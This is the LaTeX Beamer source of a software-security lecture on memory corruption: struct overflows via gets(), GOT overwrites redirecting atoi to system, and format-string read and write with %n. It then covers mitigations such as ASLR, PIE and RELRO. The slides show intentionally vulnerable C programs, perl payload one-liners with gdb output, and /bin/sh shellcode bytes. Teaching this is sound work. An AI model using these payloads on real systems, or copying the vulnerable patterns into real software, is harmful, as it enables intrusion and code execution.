\documentclass[aspectratio=169]{beamer}

\usepackage{listings}
\usepackage{tikz}

\usetheme{carpenter}

\usetikzlibrary{positioning}

\title{Software security 2, basic attacks}

\lstdefinestyle{carpenterASM}
{
language = [x86masm]Assembler,
    basicstyle = {\ttfamily \color{white}},
    backgroundcolor = {\color{carpenterblue}},
    stringstyle = {\color{purple}},
    numberstyle = {\color{pink}},
    keywordstyle = {\color{carpenterpink}},
    keywordstyle = [2]{\color{carpenterpink}},
    keywordstyle = [3]{\color{yellow}},
    keywordstyle = [4]{\color{teal}},
    otherkeywords = {;,++,uint32_t},
    morekeywords = [2]{;},
    morekeywords = [3]{<<<, ==>},
    morekeywords = [4]{++},
}

\lstdefinestyle{carpenterC}
{
    language = C,
    basicstyle = {\ttfamily \color{white}},
    backgroundcolor = {\color{carpenterblue}},
    stringstyle = {\color{purple}},
    numberstyle = {\color{pink}},
    keywordstyle = {\color{carpenterpink}},
    keywordstyle = [2]{\color{carpenterpink}},
    keywordstyle = [3]{\color{yellow}},
    keywordstyle = [4]{\color{teal}},
    otherkeywords = {;,<<,>>,++,uint32_t},
    morekeywords = [2]{;},
    morekeywords = [3]{<<, >>},
    morekeywords = [4]{++},
}

\lstdefinestyle{carpenterCsmall}
{
    language = C,
    basicstyle = {\ttfamily \footnotesize \color{white}},
    backgroundcolor = {\color{carpenterblue}},
    stringstyle = {\color{purple}},
    numberstyle = {\color{pink}},
    keywordstyle = {\color{carpenterpink}},
    keywordstyle = [2]{\color{carpenterpink}},
    keywordstyle = [3]{\color{yellow}},
    keywordstyle = [4]{\color{teal}},
    otherkeywords = {;,<<,>>,++,uint32_t},
    morekeywords = [2]{;},
    morekeywords = [3]{<<, >>},
    morekeywords = [4]{++},
}

\lstdefinestyle{carpenterBASH}
{
    language = bash,
    basicstyle = {\ttfamily \color{white}},
    backgroundcolor = {\color{carpenterblue}},
    stringstyle = {\color{purple}},
    numberstyle = {\color{pink}},
    keywordstyle = {\color{carpenterpink}},
    keywordstyle = [2]{\color{carpenterpink}},
    keywordstyle = [3]{\color{yellow}},
    keywordstyle = [4]{\color{teal}},
    otherkeywords = {;,<<,>>,++,uint32_t},
    morekeywords = [2]{;},
    morekeywords = [3]{<<, >>},
    morekeywords = [4]{++},
}

\begin{document}
\begin{frame}
    \titlepage
\end{frame}

\begin{frame}[containsverbatim]
    \frametitle{SOFTWARE SECURITY 2}

    In this lecture we will have
    \begin{itemize}
        \item dynamic libraries and dynamic compiled binaries;
        \item 32 bit machine without ASLR (but it will impact relatively);
        \item NX stack and Stack Canaries (but they will not impact).
    \end{itemize}
    \begin{minipage}{.45\textwidth}
        \includegraphics[width=\textwidth]{checksec}
    \end{minipage}
    \begin{minipage}{.54\textwidth}
        \begin{lstlisting}[style=carpenterBASH]
$ ldd ./vulnerable
linux-gate.so =>  (0xb7708000)
libc.so.6 => (0xb754e000)
/lib/ld-linux.so.2 (0xb7709000)
        \end{lstlisting}
    \end{minipage}
\end{frame}

\begin{frame}[containsverbatim]
    \frametitle{MEMORY CORRUPTION: ARBITRARY READ}
    An arbitrary read is the possibility to read every part of the
    memory (mapped) in the process:
    \begin{lstlisting}[style=carpenterC]
uint32_t arbitrary_read(uint32_t *ptr) {
    return *ptr;
}
    \end{lstlisting}
    This can help us to leak canaries and leak a pointer in ASLR!
    (thus, if we have this kind of vulnerability, we can bypass
    these mitigations).
\end{frame}

\begin{frame}[containsverbatim]
    \frametitle{SIMPLE ARBITRARY READ}

    \begin{minipage}{.5\textwidth}
    \begin{lstlisting}[style=carpenterC]
struct person {
    char age[4];
    char *name;
};
int main(...) {
    struct person a;
    a.name = malloc(20);
    printf("name?\n");
    gets(a.name);
    printf("age?\n");
    gets(a.age);
    printf("%s\n", a.name);
    return 0;
}
    \end{lstlisting}
    \end{minipage}
    \begin{minipage}{.49\textwidth}
        \begin{figure}
            \centering
            \begin{tikzpicture}
                \node[draw, minimum width=3cm, minimum height=.5cm] (a) {a.age};
                \node[draw, minimum width=3cm, minimum height=.5cm, below=0cm of a] (b) {\&a.name};
            \end{tikzpicture}
        \end{figure}
    \end{minipage}
\end{frame}

\begin{frame}[containsverbatim]
    \frametitle{SIMPLE ARBITRARY READ}

    \begin{minipage}{.5\textwidth}
    \begin{lstlisting}[style=carpenterC]
struct person {
    char age[4];
    char *name;
};
int main(...) {
    struct person a;
    a.name = malloc(20);
    printf("name?\n");
    gets(a.name);
    printf("age?\n");
    gets(a.age);
    printf("%s\n", a.name);
    return 0;
}
    \end{lstlisting}
    \end{minipage}
    \begin{minipage}{.49\textwidth}
        \begin{figure}
            \centering
            \begin{tikzpicture}
                \node[fill=carpenterblue, white, minimum width=3cm, minimum height=.5cm] (a) {age[0..4]};
                \node[fill=carpenterblue, white, minimum width=3cm, minimum height=.5cm, below=0cm of a] (a) {age[5..8]};
            \end{tikzpicture}
        \end{figure}
    \end{minipage}
\end{frame}

\begin{frame}[containsverbatim]
    \frametitle{SIMPLE ARBITRARY READ}

    \begin{minipage}{.5\textwidth}
    \begin{lstlisting}[style=carpenterC]
struct person {
    char age[4];
    char *name;
};
int main(...) {
    struct person a;
    a.name = malloc(20);
    printf("name?\n");
    gets(a.name);
    printf("age?\n");
    gets(a.age);
    printf("%s\n", a.name);
    return 0;
}
    \end{lstlisting}
    \end{minipage}
    \begin{minipage}{.49\textwidth}
        This command will read the content of the memory at
        0x43434343
        \begin{lstlisting}[style=carpenterBASH]
$ perl -e \
  'print "A\n","B"x20,"C"x4' |
  ./vuln
        \end{lstlisting}
    \end{minipage}
\end{frame}

\begin{frame}[containsverbatim]
    \frametitle{MEMORY CORRUPTION: ARBITRARY WRITE}
    An arbitrary wirte is the possibility to write every part of the
    memory (mapped) in the process:
    \begin{lstlisting}[style=carpenterC]
void arbitrary_write(uint32_t *ptr, uint32_t val) {
    *ptr = val;
}
    \end{lstlisting}
    This can help us to execute code in the program, altering the
    program flow.
\end{frame}

\begin{frame}[containsverbatim]
    \frametitle{SIMPLE ARBITRARY WRITE "HEAP" OVERFLOW}
    \begin{minipage}{.49\textwidth}
    \begin{lstlisting}[style=carpenterC]
struct person {
    char age[4];
    char *name;
};
int main(...) {
    struct person a;
    a.name = malloc(20);
    printf("age?\n");
    gets(a.age);
    printf("name?\n");
    gets(a.name);
    return 0;
}
    \end{lstlisting}
    \end{minipage}
    \begin{minipage}{.49\textwidth}
        \begin{figure}
            \centering
            \begin{tikzpicture}
                \node[draw, minimum width=3cm, minimum height=.5cm] (a) {age};
                \node[draw, minimum width=3cm, minimum height=.5cm, below=0cm of a] (a) {name};
            \end{tikzpicture}
        \end{figure}
    \end{minipage}
\end{frame}

\begin{frame}[containsverbatim]
    \frametitle{SIMPLE ARBITRARY WRITE "HEAP" OVERFLOW}
    \begin{minipage}{.49\textwidth}
    \begin{lstlisting}[style=carpenterC]
struct person {
    char age[4];
    char *name;
};
int main(...) {
    struct person a;
    a.name = malloc(20);
    printf("age?\n");
    gets(a.age);
    printf("name?\n");
    gets(a.name);
    return 0;
}
    \end{lstlisting}
    \end{minipage}
    \begin{minipage}{.49\textwidth}
        \begin{figure}
            \centering
            \begin{tikzpicture}
                \node[fill=carpenterblue, white, minimum width=3cm, minimum height=.5cm] (a) {A A A A};
                \node[fill=carpenterblue, white, minimum width=3cm, minimum height=.5cm, below=0cm of a] (a) {\&? ? ? ?};
            \end{tikzpicture}
        \end{figure}
    \end{minipage}
\end{frame}

\begin{frame}[containsverbatim]
    \frametitle{SIMPLE ARBITRARY WRITE "HEAP" OVERFLOW}

    \begin{minipage}{.5\textwidth}
    \begin{lstlisting}[style=carpenterC]
struct person {
    char age[4];
    char *name;
};
int main(...) {
    struct person a;
    a.name = malloc(20);
    printf("age?\n");
    gets(a.age);
    printf("name?\n");
    gets(a.name);
    return 0;
}
    \end{lstlisting}
    \end{minipage}
    \begin{minipage}{.49\textwidth}
        This command will write ``ciao'' to the memory at
        0x43434343
        \begin{lstlisting}[style=carpenterBASH]
$ perl -e \
  'print "AAAACCCC\n","ciao"'|
  ./vuln
        \end{lstlisting}
    \end{minipage}
\end{frame}

\begin{frame}[containsverbatim]
    \frametitle{MEMORY CORRUPTION: ARBITRARY EXECUTION}
    An arbitrary execution is the possibility to execute every part
    of the memory (mapped) in the process:
    \begin{lstlisting}[style=carpenterC]
void *arbitrary_execute(void *(*ptr)(void*), void *arg) {
    return ptr(arg);
}
    \end{lstlisting}
    This can help us to execute code in the program, altering the
    program flow.
\end{frame}

\begin{frame}[containsverbatim]
    \frametitle{MEMORY CORRUPTION: ARBITRARY EXECUTION}
    \begin{minipage}{.49\textwidth}
    \begin{lstlisting}[style=carpenterC]
void bark(char *s) {
    printf("woof %s!\n", s); }
struct animal {
    char name[4];
    void (*cry)(char *);
};
int main(...) {
    char s[128];
    struct animal dog;
    dog.cry = bark;
    gets(dog.name);
    gets(s);
    dog.cry(s);
}
    \end{lstlisting}
    \end{minipage}
    \begin{minipage}{.49\textwidth}
        \begin{figure}
            \centering
            \begin{tikzpicture}
                \node[draw, minimum width=3cm, minimum height=.5cm] (a) {name};
                \node[draw, minimum width=3cm, minimum height=.5cm, below=0cm of a] (a) {cry()};
            \end{tikzpicture}
        \end{figure}
    \end{minipage}
\end{frame}

\begin{frame}[containsverbatim]
    \frametitle{MEMORY CORRUPTION: ARBITRARY EXECUTION}
    \begin{minipage}{.49\textwidth}
    \begin{lstlisting}[style=carpenterC]
void bark(char *s) {
    printf("woof %s!\n", s); }
struct animal {
    char name[4];
    void (*cry)(char *);
};
int main(...) {
    char s[128];
    struct animal dog;
    dog.cry = bark;
    gets(dog.name);
    gets(s);
    dog.cry(s);
}
    \end{lstlisting}
    \end{minipage}
    \begin{minipage}{.49\textwidth}
        This command will execute the function at 0x43434343
        with parameter ``ls''
        \begin{lstlisting}[style=carpenterBASH]
$ perl -e \
  'print "AAAACCCC\n","ls"'|
  ./vuln
        \end{lstlisting}
    \end{minipage}
\end{frame}

\begin{frame}[containsverbatim]
    \frametitle{MEMORY CORRUPTION: ARBITRARY EXECUTION}
    \begin{lstlisting}[style=carpenterBASH]
$ echo "p system" | gdb -q ./vuln
Reading symbols from ./vuln...done.
(gdb) $1 = 0x80483d0 <system@plt>
$ perl -e 'print "AAAA\xd0\x83\x04\x08\n","ls" | ./vuln
Name?
Cry?
vuln  vuln.c
    \end{lstlisting}
\end{frame}

\begin{frame}[containsverbatim]
    \frametitle{DYNAMIC LIBRARIES}
    A dynamic library is a piece of code that is loaded in the
    binary just before the run-time, it has severeal advantages:
    \begin{itemize}
        \item Share the code of the library just when needed
            (you'll have only a copy of printf in memory).
        \item Upgrade the library once for all the programs that
            uses it.
        \item Reduce the size of the binary code of the users.
    \end{itemize}
\end{frame}

\begin{frame}[containsverbatim]
    \frametitle{DYNAMIC LIBRARIES}
    % Immagine dynamic libraries vs static
    \begin{minipage}{.40\textwidth}
        \begin{tikzpicture}
            \node [] (name) {Static Library};
            \node [draw, minimum height=5cm, minimum width=4cm, below=0cm of name] (prg) {Program};
            \node [draw, minimum height=1cm, minimum width=3cm,below=3cm of name] (printf) {printf};
        \end{tikzpicture}
    \end{minipage}
    \begin{minipage}{.56\textwidth}
        \begin{tikzpicture}
            \node [minimum width=4cm, minimum height=1cm] (name) {Dynamic Library};
            \node [minimum width=4cm, right=.3cm of name, minimum height=1cm] (libover) {};

            \node [draw, minimum height=2.4cm, minimum width=4cm,below=0cm of name] (prg) {Program};
            \node [draw, minimum height=2.4cm, minimum width=4cm,below=0.2cm of prg] (prg1) {Program};
            \node [draw, minimum height=5cm, minimum width=3cm,below=0cm of libover] (lib) {Library};
            \node [draw, minimum height=1cm, minimum width=2cm,below=3cm of libover] (printf) {printf};
        \end{tikzpicture}
    \end{minipage}
\end{frame}

\begin{frame}[containsverbatim]
    \frametitle{DYNAMIC LIBRARIES: GOT AND PLT}
    The program (or the library) could be loaded in every point of
    the memory (also to be compatible with ASLR).
    To do so a \textbf{G}lobal \textbf{O}ffset \textbf{T}able is
    loaded in the program (by ld, the dynamic loader), to get the
    address of a symbol.

    \begin{tikzpicture}
        \node[minimum width=2cm, minimum height=1cm] (textlabel) { .text };
        \node[draw, minimum width=2cm, minimum height=1cm, below=0cm of textlabel] (textval) { where is errno? };

        \node[minimum width=2cm, minimum height=1cm, right=3cm of textlabel] (gotlabel) { .got };
        \node[draw, minimum width=2cm, minimum height=1cm, below=0cm of gotlabel] (gotval1)  { val01 @ libcbase + 0x0c  };
        \node[draw, minimum width=2cm, minimum height=1cm, below=0cm of gotval1]  (goterrno) { errno @ libcbase + 0x10  };

    \end{tikzpicture}
\end{frame}

\begin{frame}[containsverbatim]
    \frametitle{DYNAMIC LIBRARIES: GOT AND PLT}
    The program (or the library) could be loaded in every point of
    the memory (also to be compatible with ASLR).
    To do so a \textbf{G}lobal \textbf{O}ffset \textbf{T}able,
    \textbf{P}rocedure \textbf{L}inkage \textbf{T}able is
    loaded in the program (by ld, the dynamic loader), to get the
    address of a function.

    \begin{tikzpicture}
        \node[minimum width=2cm, minimum height=1cm] (textlabel) { .text };
        \node[draw, minimum width=2cm, minimum height=1cm, below=0cm of textlabel] (textval) { where is errno? };
        \node[draw, minimum width=2cm, minimum height=1cm, below=0cm of textval] (textval2) { where is puts? };

        \node[minimum width=2cm, minimum height=1cm, right=3cm of textlabel] (gotlabel) { .got };
        \node[draw, minimum width=2cm, minimum height=1cm, below=0cm of gotlabel] (gotval1)  { val01 @ libcbase + 0x0c  };
        \node[draw, minimum width=2cm, minimum height=1cm, below=0cm of gotval1]  (goterrno) { errno @ libcbase + 0x10  };

        \node[minimum width=2cm, minimum height=1cm, right=3cm of gotlabel] (gotpltlabel) { .got.plt };
        \node[draw, minimum width=2cm, minimum height=1cm, below=0cm of gotpltlabel] (gotpltsys)  { puts @ libcbase + 0x5c  };
        \node[draw, minimum width=2cm, minimum height=1cm, below=0cm of gotpltsys]  (gotpltprintf) { gets @ libcbase + 0x60  };

    \end{tikzpicture}
\end{frame}

\begin{frame}[containsverbatim]
    \frametitle{DYNAMIC LIBRARIES: LOADING}
    The \texttt{.got.plt} is not loaded \textbf{a priori}, but is
    loaded in a lazy fashion, when the function is called for the
    first time, its offset is loaded in the section.  The procedures
    to load the values in the \texttt{.got.plt} are loaded in the
    \texttt{.plt} section.

    \begin{tikzpicture}
        \node[minimum width=2cm, minimum height=1cm] (textlabel) { .text };
        \node[draw, minimum width=2cm, minimum height=1cm, below=0cm of textlabel] (textval2) { where is puts? };

        \node[minimum width=2cm, minimum height=1cm, right=3cm of textlabel] (gotpltlabel) { .got.plt };
        \node[draw, minimum width=2cm, minimum height=1cm, below=0cm of gotpltlabel] (gotpltsys)  { puts @ libcbase + 0x??  };
        \node[draw, minimum width=2cm, minimum height=1cm, below=0cm of gotpltsys]  (gotpltprintf) { gets @ libcbase + 0x60  };

        \node[minimum width=2cm, minimum height=1cm, right=3cm of gotpltlabel] (pltlabel) { .plt };
        \node[draw, minimum width=4cm, minimum height=1cm, below=0cm of pltlabel] (pltsys)  { load(puts)  };
    \end{tikzpicture}
\end{frame}

\begin{frame}[containsverbatim]
    \frametitle{DYNAMIC LIBRARIES: LOADING}
    To call the \texttt{.plt} stub just the first time, the
    \texttt{.got.plt} entry is loaded with the address of the
    \texttt{.plt} stub.  The stub will then overwrite the
    \texttt{.got.plt} entry.

    \begin{tikzpicture}
        \node[minimum width=2cm, minimum height=1cm] (textlabel) { .text };
        \node[draw, minimum width=2cm, minimum height=1cm, below=0cm of textlabel] (textval2) { where is puts? };

        \node[minimum width=2cm, minimum height=1cm, right=3cm of textlabel] (gotpltlabel) { .got.plt };
        \node[below=0cm of gotpltlabel] (gotpltmiddle)  { };
        \node[draw, minimum width=2cm, minimum height=1cm, below=0cm of gotpltmiddle] (gotpltsys)  { puts @ libcbase + 0x??  };
        \node[draw, minimum width=2cm, minimum height=1cm, below=0cm of gotpltsys]  (gotpltprintf) { gets @ libcbase + 0x60  };

        \node[minimum width=2cm, minimum height=1cm, right=3cm of gotpltlabel] (pltlabel) { .plt };
        \node[below=0cm of pltlabel] (pltmiddle)  { };
        \node[draw, minimum width=4cm, minimum height=1cm, below=0cm of pltmiddle] (pltsys)  { load(puts)  };

        \draw[white, -latex] (gotpltsys.east)  -- (pltsys.west);
        \draw[white, -latex]  (pltsys.north) -- (pltmiddle.center) -- (gotpltmiddle.center) -- (gotpltsys.north);
    \end{tikzpicture}
\end{frame}

\begin{frame}[containsverbatim]
    \frametitle{DYNAMIC LIBRARIES: LOADING}
    To call the \texttt{.plt} stub just the first time, the
    \texttt{.got.plt} entry is loaded with the address of the
    \texttt{.plt} stub.  The stub will then overwrite the
    \texttt{.got.plt} entry.

    \begin{tikzpicture}
        \node[minimum width=2cm, minimum height=1cm] (textlabel) { .text };
        \node[draw, minimum width=2cm, minimum height=1cm, below=0cm of textlabel] (textval2) { where is puts? };

        \node[minimum width=2cm, minimum height=1cm, right=3cm of textlabel] (gotpltlabel) { .got.plt };
        \node[below=0cm of gotpltlabel] (gotpltmiddle)  { };
        \node[white, minimum width=4cm, fill=carpenterblue, minimum height=1cm, below=0cm of gotpltmiddle] (gotpltsys)  { puts };
        \node[draw, minimum width=2cm, minimum height=1cm, below=0cm of gotpltsys]  (gotpltprintf) { gets @ libcbase + 0x60  };

        \node[minimum width=2cm, minimum height=1cm, right=3cm of gotpltlabel] (pltlabel) { .plt };
        \node[below=0cm of pltlabel] (pltmiddle)  { };
        \node[draw, minimum width=4cm, minimum height=1cm, below=0cm of pltmiddle] (pltsys)  { load(puts)  };

        \draw[white, -latex] (gotpltsys.east)  -- (pltsys.west);
        \draw[white, -latex]  (pltsys.north) -- (pltmiddle.center) -- (gotpltmiddle.center) -- (gotpltsys.north);
    \end{tikzpicture}
\end{frame}

\begin{frame}[containsverbatim]
    \frametitle{MEMORY CORRUPTION: GOT}
    To be load dynamically by the loader, the \texttt{.got.plt} must
    be mapped as executable and writable.  This enable the write of
    code in the \texttt{.got.plt} section (or \texttt{.got} section)
    to alter the behaviour of symbols.

    \begin{tikzpicture}
        \node[minimum width=2cm, minimum height=1cm] (textlabel) { .text };
        \node[draw, minimum width=2cm, minimum height=1cm, below=0cm of textlabel] (textval2) { where is puts? };

        \node[minimum width=2cm, minimum height=1cm, right=3cm of textlabel] (gotpltlabel) { .got.plt };
        \node[below=0cm of gotpltlabel] (gotpltmiddle)  { };
        \node[white, fill=carpenterblue, minimum width=4cm, minimum height=1cm, below=0cm of gotpltmiddle] (gotpltsys)  { system  };
        \node[draw, minimum width=2cm, minimum height=1cm, below=0cm of gotpltsys]  (gotpltprintf) { gets @ libcbase + 0x60  };
    \end{tikzpicture}
\end{frame}

\begin{frame}[containsverbatim]
    \frametitle{MEMORY CORRUPTION: GOT}
    \begin{minipage}{.49\textwidth}
    \begin{lstlisting}[style=carpenterC]
struct person{
    char age[4];
    char *name;
};
int main(...)
{
    struct person p;
    p.name = malloc(20);
    gets(p.age);
    gets(p.name);
    if (atoi(p.age) < 18)
        printf("disclamer\n");
    return 0;
}
    \end{lstlisting}
    \end{minipage}
    \begin{minipage}{.49\textwidth}
        \begin{lstlisting}[style=carpenterBASH]
$ gdb -q ./got
(gdb) p atoi
$1 = 0x80483f0 <atoi@plt>
(gdb) r
^C
(gdb) p system
$1 = 0xb7e63310 <__libc_system>
(gdb) q
        \end{lstlisting}
    \end{minipage}
\end{frame}

\begin{frame}[containsverbatim]
    \frametitle{MEMORY CORRUPTION: GOT}
    Issuing a command like the following we will overwrite the
    address of \texttt{atoi} loaded in the \texttt{.got.plt} with
    the address of \texttt{system} from the libc.
\begin{lstlisting}[style=carpenterBASH]
$ perl -e 'print "id\x00\x00",\
                 "\x24\xa0\x04\x08\n",\
                 "\x10\x33\xe6\xb7"' | ./got
uid=1000(vagrant) gid=1000(vagrant) groups=1000(vagrant)
disclamer
\end{lstlisting}
    Remember that atoi and system have the same signature!
\begin{lstlisting}[style=carpenterC]
int atoi(const char *nptr);
int system(const char *command);
\end{lstlisting}
\end{frame}

\begin{frame}[containsverbatim]
    \frametitle{MEMORY CORRUPTION: STRING FORMAT}
    The \texttt{*printf} functions can be used to get arbitrary read
    or write, if misplaced in the code.
    The wrong use of this function is:
    \begin{lstlisting}[style=carpenterC]
printf(argv[1]);
    \end{lstlisting}
    The user can control the format and leak or write various part
    of the memory.
\end{frame}

\begin{frame}[containsverbatim]
    \frametitle{HOW PRINTF WORKS 1}
    Printf is a variarg function.  It has a pointer to an array and
    get the next element moving from the pointer to the next value.
    %{\color{red}~It is not simple (and standard) to predict which pointer arithmetics the printf will use.}

    \begin{minipage}{.75\textwidth}
        \begin{lstlisting}[style=carpenterBASH]
printf("%x %d %c %p\n", a);
        \end{lstlisting}
    \end{minipage}
    \begin{minipage}{.24\textwidth}
        \begin{tikzpicture}
            \node[draw, minimum width=3cm, minimum height=.5cm] (a) {a};
            \node[draw, minimum width=3cm, minimum height=.5cm, below=0cm of a] (x) {\%x};
            \node[draw, minimum width=3cm, minimum height=.5cm, below=0cm of x] (d) {\%d};
            \node[draw, minimum width=3cm, minimum height=.5cm, below=0cm of d] (c) {\%c};
            \node[draw, minimum width=3cm, minimum height=.5cm, below=0cm of d] (p) {\%p};
        \end{tikzpicture}
    \end{minipage}
\end{frame}

\begin{frame}[containsverbatim]
    \frametitle{STRING FORMAT STACK READ}
    By simply providing a format the user can read the values on the
    stack (relative to the printf parameters).
        \begin{lstlisting}[style=carpenterC]
printf(argv[1]);
        \end{lstlisting}
        \begin{lstlisting}[style=carpenterBASH]
$ ./vuln "%x %x %x %x"; echo
b7fff000 804844b b7fd0000 8048440
        \end{lstlisting}
\end{frame}

\begin{frame}[containsverbatim]
    \frametitle{PRINTF FORMAT}
    An element of the standard format is composed of the following parts:
    \\
    \%[N\$][M]F
    where:
    \begin{description}
        \item[F] format, interpretation of the parameter.
        \item[N] the position of the parameter.
        \item[M] the padding format or argument of the parameter
            interpretation (e.g. pad hex number by 8
            zeroes or how much decimal numbers to print).
    \end{description}
    \begin{lstlisting}[style=carpenterC]
printf("%1$02x %1$02x %2$02x\n", 1, 2);
    \end{lstlisting}
    \begin{lstlisting}[style=carpenterBASH]
$ ./vuln
01 01 02
    \end{lstlisting}
\end{frame}

\begin{frame}[containsverbatim]
    \frametitle{PRINTF FORMAT WRITE}
    \texttt{printf} can also write values into memory (the opposite
    of \%s).  To do so one should use the format \%n.  This,
    according to the manpage, write the number of character wrote
    by the printf invocation in the value pointed by the argument

    \begin{lstlisting}[style=carpenterC]
int charprinted;
printf("ciao%n\n", &charprinted);
printf("%d\n", charprinted);
    \end{lstlisting}
    \begin{lstlisting}[style=carpenterBASH]
$ ./example
ciao
4
    \end{lstlisting}
\end{frame}

\begin{frame}[containsverbatim]
    \frametitle{STRING FORMAT ARBITRARY READ}
    Finding the parameter address and using \%s we can print an
    semi-arbitrary value of the memory.
\begin{lstlisting}[style=carpenterC]
int main(...) {
    char userpass[128];
    char pass[] = "secretpass\0";
    printf("pass @ %p\n", pass);
    gets(userpass); printf(userpass);
    gets(userpass);
    if (!strcmp(pass, userpass)) printf("flag");
}
\end{lstlisting}
\begin{lstlisting}[style=carpenterBASH]
$ perl -e 'print "\x70\xf6\xff\xbf%7\$s"' | ./arbitrary_read
pass @ 0xbffff670
....secretpass
\end{lstlisting}
\end{frame}

\begin{frame}[containsverbatim]
    \frametitle{STRING FORMAT ARBITRARY WRITE}
    As for arbitrary string read with \%s, the parameter can be
    wrote with \%n.

    Finding the parameter address and using \%s we can print an
    semi-arbitrary value of the memory.
\begin{lstlisting}[style=carpenterC]
    char pass[] = "secretpass";
    printf("pass @ %p\n", pass);
    gets(userpass); printf(userpass);
    if (!strcmp(pass, userpass)) printf("flag");
\end{lstlisting}
\begin{lstlisting}[style=carpenterBASH]
$ perl -e 'print "\x70\xf6\xff\xbf%65c%7\$n%7\$s|\nE\n"' |
    ./arbitrary_read
pass @ 0xbffff670
....       p|E
flag
\end{lstlisting}
\end{frame}

\begin{frame}[containsverbatim]
    \frametitle{MITIGATIONS}

    We've described some mitigations, let's complete the list

    \begin{center}
        \includegraphics[height=.5\textheight]{checksec}
    \end{center}
\end{frame}

\begin{frame}[containsverbatim]
    \frametitle{MITIGATION: FORTIFY}

    Fortify source add some common test (at compiler level) to remove
    buffer overflow in functions, (e.g. check if strcpy is made in
    boundaries).\\
    It only catch common behaviour and it is specific for the
    compiler family and the compiled library.
\begin{lstlisting}
$ gcc -D_FORTIFY_SOURCE=1
\end{lstlisting}
\end{frame}

\begin{frame}[containsverbatim]
    \frametitle{MITIGATION: ASLR}

    \begin{minipage}{.49\textwidth}
    C Code
    \begin{lstlisting}[style=carpenterC]
int foo(int _) {
    uint32_t a;
    uint32_t b;
    uint32_t c;
    uint32_t d;
    char e[4];

    gets(e);
==>    return 0;
}
    \end{lstlisting}

    \end{minipage}
    \begin{minipage}{.5\textwidth}
        \begin{figure}
            \centering
            \begin{tikzpicture}
                \node[draw, minimum width=4cm, minimum height=.5cm] (a) {Local parameters};
                \node[white, fill=carpenterblue, minimum width=4cm, minimum height=.5cm, below=0cm of a] (b) {? ? ? ?};
                \node[left=.5cm of b] (baseleft) {};
                \node[white, fill=carpenterblue, minimum width=4cm, minimum height=.5cm, below=0cm of b] (c) {0x31 0xc0 0x99 0x50};
                \node[white, fill=carpenterblue, minimum width=4cm, minimum height=.5cm, below=0cm of c] (d) {0x68 0x2f 0x2f 0x73};
                \node[white, fill=carpenterblue, minimum width=4cm, minimum height=.5cm, below=0cm of d] (e) {0x68 0x68 0x2f 0x62};
                \node[white, fill=carpenterblue, minimum width=4cm, minimum height=.5cm, below=0cm of e] (1) {0x69 0x6e 0x89 0xe3};
                \node[white, fill=carpenterblue, minimum width=4cm, minimum height=.5cm, below=0cm of 1] (2) {0x50 0x53 0x89 0xe1};
                \node[white, fill=carpenterblue, minimum width=4cm, minimum height=.5cm, below=0cm of 2] (3) {0xb0 0x0b 0xcd 0x80};
                \node[left=.5cm of 3] (endleft) {};
                \draw[white, thick, ->] (b) -- (baseleft.center) -- (endleft.center) -- (3);
            \end{tikzpicture}
        \end{figure}
    \end{minipage}
\end{frame}

\begin{frame}[containsverbatim]
    \frametitle{MITIGATION: PIE}
    ASLR do not conver the binary addresses but only the dynamic
    part of the ELF (the stack, the global variables and the loaded
    libraries).  So if you have a function in the \texttt{.text}
    section it can be placed in the \texttt{.got} or \texttt{.plt}
    to be called.
\begin{lstlisting}[style=carpenterC]
void foo(void) { system("ls"); }
int main(int argc, char **argv) {
    int i = 0;
    uint8_t  *base = (uint8_t *)printf;
    uint32_t **got_entry = (uint32_t **)(base+2);
    uint32_t *got_plt_entry = *got_entry;
    printf("GOT  0x%08x\n", (uint32_t)printf);
    printf("LIBC 0x%08x\n", *got_plt_entry);
    printf("FOO  0x%08x\n", (uint32_t)foo);
}
\end{lstlisting}
\end{frame}

\begin{frame}[containsverbatim]
    \frametitle{MITIGATION: PIE}
    ASLR do not conver the binary addresses but only the dynamic
    part of the ELF (the stack, the global variables and the loaded
    libraries).  So if you have a function in the \texttt{.text}
    section it can be placed in the \texttt{.got} or \texttt{.plt}
    to be called.
\begin{lstlisting}[style=carpenterBASH]
$ ./test
GOT  0x08048310
LIBC 0xb759e410
FOO  0x0804844d
$ ./test
GOT  0x08048310
LIBC 0xb75db410
FOO  0x0804844d
\end{lstlisting}
\end{frame}

\begin{frame}[containsverbatim]
    \frametitle{MITIGATION: PIE}
    When compiled as a \textbf{P}osition \textbf{I}ndipendent
    \textbf{E}xecutable, the entire code will get randomized, and
    the program will start from a random address
\begin{lstlisting}[style=carpenterBASH]
$ ./test
LIBC  0x7f8562d56e80
FOO  0x5651ebd9567a
$ ./test
LIBC  0x7f7b96b6ae80
FOO  0x555ed44bc67a
\end{lstlisting}
\end{frame}

\begin{frame}[containsverbatim]
    \frametitle{MITIGATION: PARTIAL RELRO}
    RELRO (abbreviation of RELocation Read Only), it is a mitigation
    which is applied at \texttt{.got} and \texttt{.plt}.  Its partial
    version applies the following protections:
    \begin{itemize}
        \item Change the memory layout to be less vulnerable to attacks.
        \item Make the \texttt{.got} Read Only ({\color{red}~but
            not the \texttt{.got.plt}!}), that is, global
            exported variables are protected.
    \end{itemize}
\end{frame}

\begin{frame}[containsverbatim]
    \frametitle{MITIGATION: FULL RELRO}
    RELRO (abbreviation of RELocation Read Only), it is a mitigation
    which is applied at \texttt{.got} and \texttt{.plt}.  Its full
    version applies the mitigation introduced by the partial version
    plus the following protections:
    \begin{itemize}
        \item Load every function at loading time (disable lazy
            load);
        \item Make the \texttt{.got.plt} Read Only, that is, the
            dynamic function table cannot be wrote.
    \end{itemize}
\end{frame}

\end{document}
